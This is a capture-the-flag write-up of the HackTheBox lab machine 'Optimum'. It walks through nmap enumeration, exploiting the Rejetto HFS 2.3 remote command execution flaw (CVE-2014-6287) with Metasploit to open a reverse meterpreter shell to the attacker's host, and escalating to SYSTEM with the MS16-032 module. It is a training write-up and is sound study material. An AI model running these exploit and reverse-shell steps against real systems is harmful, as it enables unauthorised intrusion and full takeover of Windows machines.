Optimum

2 March 2021
HackTheBox Windows

Starting information

  • Machine IP : 10.10.10.8
  • System : Windows

Network enumeration

I start by modifying my /etc/hosts file to avoid writing the IP everytime :

/etc/hosts
10.10.10.8 optimum

Then I look for open ports:

nmap -p- optimum -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-02 08:47 CET
Nmap scan report for optimum (10.10.10.8)
Host is up (0.040s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 107.31 seconds

There is only one open port: 80. Now I can start nmap scripts on the open port to gather more information:

nmap -p80 -A -Pn optimum
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-02 08:50 CET
Nmap scan report for optimum (10.10.10.8)
Host is up (0.049s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.99 seconds

Information gathered

Operating System

Windows

Open ports

PortService
80/tcphttp

This port runs a rejetto HTTP file server, on version 2.3. This information is actually directly available when visiting the web page.

Vulnerabilities

A quick search of HFS 2.3 yields multiple results indicating that this version is vulnerable to a remote command execution (CVE-2014-6287). From the exploit database or digitalmunition we even have some exploit code.

In this case, I'll do my script kiddie and just run the script to get the first flag. Running it gives me a user shell where I retrieve the user flag. I now need to find a way to perform a privilege escalation.

Switching to metasploit

To continue with the exploit, I'll switch to metasploit. I start the program with sudo msfconsole-start. I can now search for the exploit I previously used with search hfs.

msf6 > search hfs

Matching Modules
================

   #  Name                                        Disclosure Date  Rank       Check  Description
   -  ----                                        ---------------  ----       -----  -----------
   0  exploit/multi/http/git_client_command_exec  2014-12-18       excellent  No     Malicious Git and Mercurial HTTP Server For CVE-2014-9390
   1  exploit/windows/http/rejetto_hfs_exec       2014-09-11       excellent  Yes    Rejetto HttpFileServer Remote Command Execution


Interact with a module by name or index. For example info 1, use 1 or use exploit/windows/http/rejetto_hfs_exec

I select the right exploit with the command use <exploit_path>:

msf6 > use exploit/windows/http/rejetto_hfs_exec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp

I configure my payload with set <option_name> <option_value>:

msf6 exploit(windows/http/rejetto_hfs_exec) > set LHOST 10.10.14.9
LHOST => 10.10.14.9
msf6 exploit(windows/http/rejetto_hfs_exec) > set RHOSTS 10.10.10.8
RHOSTS => 10.10.10.8

In metasploit, use show options to find out what you can configure.

Finally I can use exploit to start the exploit:

msf6 exploit(windows/http/rejetto_hfs_exec) > exploit

[*] Started reverse TCP handler on 10.10.14.9:4444
[*] Using URL: http://0.0.0.0:5555/ZLXJo9B
[*] Local IP: http://10.0.2.15:5555/ZLXJo9B
[*] Server started.
[*] Sending a malicious request to /
/usr/share/metasploit-framework/modules/exploits/windows/http/rejetto_hfs_exec.rb:110: warning: URI.escape is obsolete
/usr/share/metasploit-framework/modules/exploits/windows/http/rejetto_hfs_exec.rb:110: warning: URI.escape is obsolete
[*] Payload request received: /ZLXJo9B
[*] Sending stage (175174 bytes) to 10.10.10.8
[*] Meterpreter session 1 opened (10.10.14.9:4444 -> 10.10.10.8:49170) at 2021-03-02 09:26:13 +0100
[!] Tried to delete %TEMP%\GvutIggGGOnltT.vbs, unknown result
[*] Server stopped.

meterpreter >

I now have a proper shell in meterpreter:

meterpreter > dir
Listing: C:\Users\kostas\Desktop
================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40777/rwxrwxrwx   0       dir   2021-03-08 18:30:22 +0100  %TEMP%
100666/rw-rw-rw-  282     fil   2017-03-18 12:57:16 +0100  desktop.ini
100777/rwxrwxrwx  760320  fil   2014-02-16 12:58:52 +0100  hfs.exe
100444/r--r--r--  32      fil   2017-03-18 13:13:18 +0100  user.txt.txt

Information gathering

I can use the sysinfo command to retrieve information about my current session:

meterpreter > sysinfo
Computer        : OPTIMUM
OS              : Windows 2012 R2 (6.3 Build 9600).
Architecture    : x64
System Language : el_GR
Domain          : HTB
Logged On Users : 1
Meterpreter     : x86/windows

And I can use getuid to get info about my current user:

meterpreter > getuid
Server username: OPTIMUM\kostas

Unfortunately my user is not an administrator, so I'll have to perform a privilege escalation.

Getting root

Meterpreter provides the getsystem command to attempt to elevate the user privileges:

    Command       Description
    -------       -----------
    getsystem     Attempt to elevate your privilege to that of local system.

Unfortunately it fails on this system:

meterpreter > getsystem
[-] 2001: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)

After doing a quick search for "Windows R2012 privilege escalation", I can see that there are some vulnerabilities that I can exploit through this session. I return to the console while keeping the session in the background with bg, and to the menu with back. And search for my exploit named MS16_032:

meterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(windows/http/rejetto_hfs_exec) > back
msf6 > search MS16_032

Matching Modules
================

   #  Name                                                           Disclosure Date  Rank    Check  Description
   -  ----                                                           ---------------  ----    -----  -----------
   0  exploit/windows/local/ms16_032_secondary_logon_handle_privesc  2016-03-21       normal  Yes    MS16-032 Secondary Logon Handle Privilege Escalation


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/local/ms16_032_secondary_logon_handle_privesc

I select this exploit with the use command and set the SESSION, LHOST and LPORT options. I make sure that the LPORT is a new port that isn't already in use.

Use sessions -l to list active sessions

Now I can start the script with exploit, and there I have my admin shell:

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Back to Write-Ups